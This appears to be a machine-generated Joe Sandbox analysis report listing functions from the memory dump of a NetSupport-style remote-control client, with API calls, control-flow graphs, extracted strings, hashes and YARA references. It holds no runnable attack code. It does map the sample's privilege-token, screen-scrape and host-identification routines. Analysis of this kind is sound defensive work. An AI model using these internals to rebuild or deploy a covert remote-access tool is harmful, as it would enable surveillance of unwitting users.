                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                        • String ID:
                                                                                        • API String ID: 2349140579-0
                                                                                        • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                        • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                        • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                        • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                        Function 1109D4D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                        • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                        • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                        • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                        • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                        Function 1102E640 Relevance: 241.6, APIs: 31, Strings: 106, Instructions: 1869windowthreadsleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                          • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                          • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                          • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                          • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                          • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                        • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                        • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                          • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                          • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                          • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                        • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                        • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                        • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                        • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                        • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                        • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                          • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                          • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                          • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                          • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                        • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                        • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                        • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                        • SetWindowPos.USER32(0002043C,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                        • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                        • wsprintfA.USER32 ref: 1102FFA5
                                                                                        • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                          • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1B492F88,00000002,74DF2EE0), ref: 1112820A
                                                                                          • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                          • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$016477$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                        • API String ID: 1099283604-1382196521
                                                                                        • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                        • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                        • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                        • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52
                                                                                        Function 1102DB00 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 990 1102db00-1102db50 call 1110f420 993 1102db52-1102db66 call 11142a60 990->993 994 1102db68 990->994 996 1102db6e-1102dbb3 call 11142290 call 11142ac0 993->996 994->996 1002 1102dd53-1102dd62 call 11144dc0 996->1002 1003 1102dbb9 996->1003 1009 1102dd68-1102dd78 1002->1009 1004 1102dbc0-1102dbc3 1003->1004 1007 1102dbc5-1102dbc7 1004->1007 1008 1102dbe8-1102dbf1 1004->1008 1010 1102dbd0-1102dbe1 1007->1010 1011 1102dbf7-1102dbfe 1008->1011 1012 1102dd24-1102dd3d call 11142ac0 1008->1012 1013 1102dd7a 1009->1013 1014 1102dd7f-1102dd93 call 1102cc10 1009->1014 1010->1010 1015 1102dbe3 1010->1015 1011->1012 1016 1102dcf3-1102dd08 call 11162de7 1011->1016 1017 1102dc05-1102dc07 1011->1017 1018 1102dd0a-1102dd1f call 11162de7 1011->1018 1019 1102dc9a-1102dccd call 111618c1 call 11142290 1011->1019 1020 1102dcdb-1102dcf1 call 11164010 1011->1020 1021 1102dc8b-1102dc95 1011->1021 1022 1102dccf-1102dcd9 1011->1022 1023 1102dc4c-1102dc52 1011->1023 1024 1102dc7c-1102dc86 1011->1024 1012->1004 1042 1102dd43-1102dd45 1012->1042 1013->1014 1037 1102dd98-1102dd9d 1014->1037 1015->1012 1016->1012 1017->1012 1033 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1017->1033 1018->1012 1019->1012 1020->1012 1021->1012 1022->1012 1026 1102dc54-1102dc68 call 11162de7 1023->1026 1027 1102dc6d-1102dc77 1023->1027 1024->1012 1026->1012 1027->1012 1033->1012 1044 1102de43-1102de5d call 111463d0 1037->1044 1045 1102dda3-1102ddc8 call 110b7920 call 11146450 1037->1045 1042->1044 1048 1102dd4b-1102dd51 1042->1048 1057 1102deb3-1102debf call 1102b4f0 1044->1057 1058 1102de5f-1102de78 call 1105dd10 1044->1058 1065 1102ddd3-1102ddd9 1045->1065 1066 1102ddca-1102ddd1 1045->1066 1048->1002 1048->1009 1070 1102dec1-1102dec8 1057->1070 1071 1102de98-1102de9f 1057->1071 1058->1057 1069 1102de7a-1102de8c 1058->1069 1072 1102dddb-1102dde2 call 11027d60 1065->1072 1073 1102de39 1065->1073 1066->1044 1069->1057 1085 1102de8e 1069->1085 1074 1102dea5-1102dea8 1070->1074 1076 1102deca-1102ded4 1070->1076 1071->1074 1075 1102e0aa-1102e0cb GetComputerNameA 1071->1075 1072->1073 1084 1102dde4-1102de16 1072->1084 1073->1044 1079 1102deaa-1102deb1 call 110b7920 1074->1079 1080 1102ded9 1074->1080 1082 1102e103-1102e109 1075->1082 1083 1102e0cd-1102e101 call 11027c30 1075->1083 1076->1075 1089 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1079->1089 1080->1089 1087 1102e10b-1102e110 1082->1087 1088 1102e13f-1102e152 call 11164010 1082->1088 1083->1082 1109 1102e157-1102e163 1083->1109 1103 1102de20-1102de2f call 110f6080 1084->1103 1104 1102de18-1102de1e 1084->1104 1085->1071 1094 1102e116-1102e11a 1087->1094 1101 1102e347-1102e36a 1088->1101 1142 1102e07a-1102e082 SetLastError 1089->1142 1143 1102dfbc-1102dfd3 1089->1143 1099 1102e136-1102e138 1094->1099 1100 1102e11c-1102e11e 1094->1100 1108 1102e13b-1102e13d 1099->1108 1106 1102e132-1102e134 1100->1106 1107 1102e120-1102e126 1100->1107 1123 1102e392-1102e39a 1101->1123 1124 1102e36c-1102e372 1101->1124 1111 1102de32-1102de34 call 1102d330 1103->1111 1104->1103 1104->1111 1106->1108 1107->1099 1113 1102e128-1102e130 1107->1113 1108->1088 1108->1109 1114 1102e165-1102e17a call 110b7920 call 11029bd0 1109->1114 1115 1102e17c-1102e18f call 11081a70 1109->1115 1111->1073 1113->1094 1113->1106 1145 1102e1d3-1102e1ec call 11081a70 1114->1145 1135 1102e191-1102e1b4 1115->1135 1136 1102e1b6-1102e1b8 1115->1136 1125 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1123->1125 1126 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1123->1126 1124->1123 1130 1102e374-1102e38d call 1102d330 1124->1130 1126->1125 1130->1123 1135->1145 1141 1102e1c0-1102e1d1 1136->1141 1141->1141 1141->1145 1148 1102e043-1102e04f 1142->1148 1143->1148 1160 1102dfd5-1102dfde 1143->1160 1165 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1145->1165 1166 1102e32c-1102e339 call 11164010 1145->1166 1150 1102e092-1102e0a1 1148->1150 1151 1102e051-1102e05d 1148->1151 1150->1075 1156 1102e0a3-1102e0a4 FreeLibrary 1150->1156 1158 1102e06f-1102e073 1151->1158 1159 1102e05f-1102e06d GetProcAddress 1151->1159 1156->1075 1162 1102e084-1102e086 SetLastError 1158->1162 1163 1102e075-1102e078 1158->1163 1159->1158 1160->1148 1167 1102dfe0-1102e016 call 11146450 call 1112b270 1160->1167 1171 1102e08c 1162->1171 1163->1171 1202 1102e283-1102e299 call 11128ec0 1165->1202 1203 1102e26f-1102e27e call 11029450 1165->1203 1180 1102e33c-1102e341 CharUpperA 1166->1180 1167->1148 1185 1102e018-1102e03e call 11146450 call 11027920 1167->1185 1171->1150 1180->1101 1185->1148 1207 1102e2b2-1102e2ec call 110d0bd0 * 2 1202->1207 1208 1102e29b-1102e2ad call 110d0bd0 1202->1208 1203->1202 1215 1102e302-1102e32a call 11164010 call 110d07c0 1207->1215 1216 1102e2ee-1102e2fd call 11029450 1207->1216 1208->1207 1215->1180 1216->1215
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc_memsetwsprintf
                                                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$016477$14/03/16 10:38:31 V12.10F8$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 3802068140-3876049245
                                                                                        • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                        • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                        • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                        • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51
                                                                                        Function 110A9C90 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1657 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 1658 110a9cf8-110a9d09 SetupDiGetClassDevsA 1657->1658 1659 110a9e05-110a9e0d SetLastError 1657->1659 1660 110a9d0f-110a9d1d 1658->1660 1661 110a9f13-110a9f15 1658->1661 1665 110a9e19-110a9e1b SetLastError 1659->1665 1662 110a9d20-110a9d24 1660->1662 1663 110a9f1e-110a9f20 1661->1663 1664 110a9f17-110a9f18 FreeLibrary 1661->1664 1666 110a9d3d-110a9d55 1662->1666 1667 110a9d26-110a9d37 GetProcAddress 1662->1667 1668 110a9f37-110a9f52 call 11161d01 1663->1668 1664->1663 1669 110a9e21-110a9e2c GetLastError 1665->1669 1666->1669 1677 110a9d5b-110a9d5d 1666->1677 1667->1665 1667->1666 1671 110a9e32-110a9e3d _free 1669->1671 1672 110a9ec0-110a9ed1 GetProcAddress 1669->1672 1671->1662 1675 110a9edb-110a9edd SetLastError 1672->1675 1676 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 1672->1676 1678 110a9ee3-110a9ee5 1675->1678 1676->1678 1680 110a9d68-110a9d6a 1677->1680 1681 110a9d5f-110a9d65 _free 1677->1681 1678->1661 1679 110a9ee7-110a9f09 CreateFileA 1678->1679 1682 110a9f0b-110a9f10 _free 1679->1682 1683 110a9f22-110a9f2c _free 1679->1683 1684 110a9d6c-110a9d7f GetProcAddress 1680->1684 1685 110a9d85-110a9d9b 1680->1685 1681->1680 1682->1661 1686 110a9f2e-110a9f2f FreeLibrary 1683->1686 1687 110a9f35 1683->1687 1684->1685 1688 110a9e42-110a9e4a SetLastError 1684->1688 1690 110a9d9d-110a9da6 GetLastError 1685->1690 1691 110a9dac-110a9dbf call 11162b51 1685->1691 1686->1687 1687->1668 1688->1690 1690->1691 1692 110a9e81-110a9e92 call 110a9c30 1690->1692 1697 110a9ea2-110a9eb3 call 110a9c30 1691->1697 1698 110a9dc5-110a9dcd 1691->1698 1699 110a9e9b-110a9e9d 1692->1699 1700 110a9e94-110a9e95 FreeLibrary 1692->1700 1697->1699 1707 110a9eb5-110a9ebe FreeLibrary 1697->1707 1701 110a9dcf-110a9de2 GetProcAddress 1698->1701 1702 110a9de4-110a9dfb 1698->1702 1699->1668 1700->1699 1701->1702 1704 110a9e4f-110a9e51 SetLastError 1701->1704 1708 110a9e57-110a9e71 call 110a9c30 _free 1702->1708 1710 110a9dfd-110a9e00 1702->1710 1704->1708 1707->1668 1708->1699 1712 110a9e73-110a9e7c FreeLibrary 1708->1712 1710->1662 1712->1668
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(setupapi.dll,1B492F88,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                        • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                        • _free.LIBCMT ref: 110A9D60
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                        • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                        • _malloc.LIBCMT ref: 110A9DB3
                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                        • GetLastError.KERNEL32 ref: 110A9E21
                                                                                        • _free.LIBCMT ref: 110A9E33
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                        • _free.LIBCMT ref: 110A9E64
                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                        • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                        • API String ID: 3464732724-3340099623
                                                                                        • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                        • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
